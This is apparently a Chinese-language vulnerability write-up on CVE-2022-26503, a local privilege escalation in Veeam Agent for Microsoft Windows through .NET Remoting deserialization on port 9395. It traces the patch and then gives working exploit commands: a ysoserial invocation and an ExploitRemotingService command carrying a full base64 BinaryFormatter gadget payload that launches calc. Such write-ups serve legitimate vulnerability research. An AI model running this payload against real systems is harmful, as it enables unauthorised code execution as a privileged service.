CVE-2022-26503 Veeam Agent for Microsoft Windows LPE

系列 - Veeam
注意
本文最后更新于 2022-03-22,文中内容可能已过时。

继上文

漏洞分析

补丁

https://y4er.com/img/uploads/CVE-2022-26503-Veeam-Agent-for-Microsoft-Windows-LPE/1.png

Veeam.Common.Remoting.CSrvTcpChannelRegistration.CSrvTcpChannelRegistration(string, int, CSrvTcpChannelOptions)

用CBinaryServerFormatterSink新的反序列化类替换TypeFilterLevel.Full。

https://y4er.com/img/uploads/CVE-2022-26503-Veeam-Agent-for-Microsoft-Windows-LPE/2.png

需要用户账号密码。port向上追溯

Veeam.Backup.Common.COptions.BackupServerPort

https://y4er.com/img/uploads/CVE-2022-26503-Veeam-Agent-for-Microsoft-Windows-LPE/3.png

从注册表取值9395

https://y4er.com/img/uploads/CVE-2022-26503-Veeam-Agent-for-Microsoft-Windows-LPE/4.png

在日志中发现C:\ProgramData\Veeam\Endpoint\Svc.VeeamEndpointBackup.log只监听了127.0.0.1,所以只能本地提权用。

继续找一下rem的地址 VeeamService

https://y4er.com/img/uploads/CVE-2022-26503-Veeam-Agent-for-Microsoft-Windows-LPE/5.png

利用

使用https://github.com/tyranid/ExploitRemotingService直接打

https://y4er.com/img/uploads/CVE-2022-26503-Veeam-Agent-for-Microsoft-Windows-LPE/6.png

1
2
ysoserial.exe -g TextFormattingRunProperties -f BinaryFormatter -c calc
ExploitRemotingService.exe --secure --user .\administrator --pass admin16!@#  -useser tcp://127.0.0.1:9395/VeeamService raw AAEAAAD/////AQAAAAAAAAAMAgAAAF5NaWNyb3NvZnQuUG93ZXJTaGVsbC5FZGl0b3IsIFZlcnNpb249My4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj0zMWJmMzg1NmFkMzY0ZTM1BQEAAABCTWljcm9zb2Z0LlZpc3VhbFN0dWRpby5UZXh0LkZvcm1hdHRpbmcuVGV4dEZvcm1hdHRpbmdSdW5Qcm9wZXJ0aWVzAQAAAA9Gb3JlZ3JvdW5kQnJ1c2gBAgAAAAYDAAAAsgU8P3htbCB2ZXJzaW9uPSIxLjAiIGVuY29kaW5nPSJ1dGYtOCI/Pg0KPE9iamVjdERhdGFQcm92aWRlciBNZXRob2ROYW1lPSJTdGFydCIgSXNJbml0aWFsTG9hZEVuYWJsZWQ9IkZhbHNlIiB4bWxucz0iaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS93aW5meC8yMDA2L3hhbWwvcHJlc2VudGF0aW9uIiB4bWxuczpzZD0iY2xyLW5hbWVzcGFjZTpTeXN0ZW0uRGlhZ25vc3RpY3M7YXNzZW1ibHk9U3lzdGVtIiB4bWxuczp4PSJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL3dpbmZ4LzIwMDYveGFtbCI+DQogIDxPYmplY3REYXRhUHJvdmlkZXIuT2JqZWN0SW5zdGFuY2U+DQogICAgPHNkOlByb2Nlc3M+DQogICAgICA8c2Q6UHJvY2Vzcy5TdGFydEluZm8+DQogICAgICAgIDxzZDpQcm9jZXNzU3RhcnRJbmZvIEFyZ3VtZW50cz0iL2MgY2FsYyIgU3RhbmRhcmRFcnJvckVuY29kaW5nPSJ7eDpOdWxsfSIgU3RhbmRhcmRPdXRwdXRFbmNvZGluZz0ie3g6TnVsbH0iIFVzZXJOYW1lPSIiIFBhc3N3b3JkPSJ7eDpOdWxsfSIgRG9tYWluPSIiIExvYWRVc2VyUHJvZmlsZT0iRmFsc2UiIEZpbGVOYW1lPSJjbWQiIC8+DQogICAgICA8L3NkOlByb2Nlc3MuU3RhcnRJbmZvPg0KICAgIDwvc2Q6UHJvY2Vzcz4NCiAgPC9PYmplY3REYXRhUHJvdmlkZXIuT2JqZWN0SW5zdGFuY2U+DQo8L09iamVjdERhdGFQcm92aWRlcj4L

文笔垃圾,措辞轻浮,内容浅显,操作生疏。不足之处欢迎大师傅们指点和纠正,感激不尽。